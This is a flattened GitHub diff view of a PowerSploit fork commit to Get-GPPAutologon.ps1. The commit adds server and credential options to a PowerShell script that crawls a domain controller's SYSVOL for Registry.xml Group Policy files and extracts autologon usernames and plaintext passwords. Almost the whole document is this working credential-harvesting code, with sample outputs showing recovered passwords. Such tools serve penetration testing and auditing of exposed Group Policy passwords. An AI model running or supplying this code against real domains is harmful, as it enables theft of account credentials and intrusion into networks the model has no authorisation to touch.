Gh0st
/
PowerSploit
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge 863056e4c3 into d943001a7d

This commit is contained in:
Jan Rude 2020-11-04 10:43:03 -08:00 committed by GitHub
parent d943001a7d 863056e4c3
commit 1f447596e6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 57 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

81
Exfiltration/Get-GPPAutologon.ps1
View File

@ -11,19 +11,28 @@ function Get-GPPAutologon
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
Optional Dependencies: None Optional Dependencies: None
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
Default's to the users current domain controller.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain.
.DESCRIPTION .DESCRIPTION
Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password. Get-GPPAutologon searches the domain controller for registry.xml to find autologon information and returns the username and password.
.EXAMPLE .EXAMPLE
PS C:\> Get-GPPAutolgon PS C:\> Get-GPPAutolgon
UserNames File Passwords UserNames File Passwords
--------- ---- --------- --------- ---- ---------
{administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3} {administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
{NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword} {NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}
.EXAMPLE .EXAMPLE
@ -38,13 +47,26 @@ function Get-GPPAutologon
read123 read123
Recycling*3ftw! Recycling*3ftw!
.EXAMPLE
PS C:\> Get-GPPAutologon -Server DC01.example.domain -Credential example.domain\testuser
.LINK .LINK
https://support.microsoft.com/nb-no/kb/324737 https://support.microsoft.com/nb-no/kb/324737
#> #>
[CmdletBinding()] [CmdletBinding()]
Param () Param (
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server = $($ENV:LOGONSERVER -replace '\\',''),
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
#Some XML issues between versions #Some XML issues between versions
Set-StrictMode -Version 2 Set-StrictMode -Version 2
@ -52,14 +74,13 @@ function Get-GPPAutologon
#define helper function to parse fields from xml files #define helper function to parse fields from xml files
function Get-GPPInnerFields function Get-GPPInnerFields
{ {
[CmdletBinding()] [CmdletBinding()]
Param ( Param (
$File $File
) )
try try
{ {
$Filename = Split-Path $File -Leaf
[xml] $Xml = Get-Content ($File) [xml] $Xml = Get-Content ($File)
#declare empty arrays #declare empty arrays
@ -83,11 +104,10 @@ function Get-GPPAutologon
{ {
$Username += , $prop | Select-Object -ExpandProperty Value $Username += , $prop | Select-Object -ExpandProperty Value
} }
} }
Write-Verbose "Potential password in $File" Write-Verbose "Potential password in $File"
} }
#put [BLANK] in variables #put [BLANK] in variables
if (!($Password)) if (!($Password))
{ {
@ -109,31 +129,44 @@ function Get-GPPAutologon
if ($ResultsObject) if ($ResultsObject)
{ {
Return $ResultsObject Return $ResultsObject
} }
} }
} }
catch {Write-Error $Error[0]} catch {Write-Error $_}
} }
try { try {
#ensure that machine is domain joined and script is running as a domain account $PATH="\\$Server\SYSVOL"
if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) { # connect to domain controller
throw 'Machine is not a domain member or User is not a member of the domain.' if ($PSBoundParameters['Credential']) {
$DRIVE = New-PSDrive -Name DC -PSProvider FileSystem -Root \\$Server\SYSVOL -Credential $Credential -Scope global
$PATH="DC:\*"
if( -not $DRIVE ){throw 'Could not connect to domain controller.'}
} else {
if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
throw 'Machine is not a domain member or User is not a member of the domain.'
}
} }
#discover potential registry.xml containing autologon passwords #discover potential registry.xml containing autologon passwords
Write-Verbose 'Searching the DC. This could take a while.' Write-Host 'Searching the DC. This could take a while.'
$XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml' $XMlFiles = Get-ChildItem -Path $PATH -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
if ( -not $XMlFiles ) {throw 'No preference files found.'} if ( -not $XMlFiles ) {throw 'No preference files found.'}
Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords." Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
foreach ($File in $XMLFiles) { foreach ($File in $XMLFiles) {
$Result = (Get-GppInnerFields $File.Fullname) $Result = (Get-GppInnerFields $File.Fullname)
Write-Output $Result Write-Output $Result
} }
if ($PSBoundParameters['Credential']) {
Remove-PSDrive DC
}
Write-Host "Done."
} }
catch {Write-Error $Error[0]} catch {Write-Error $_}
} }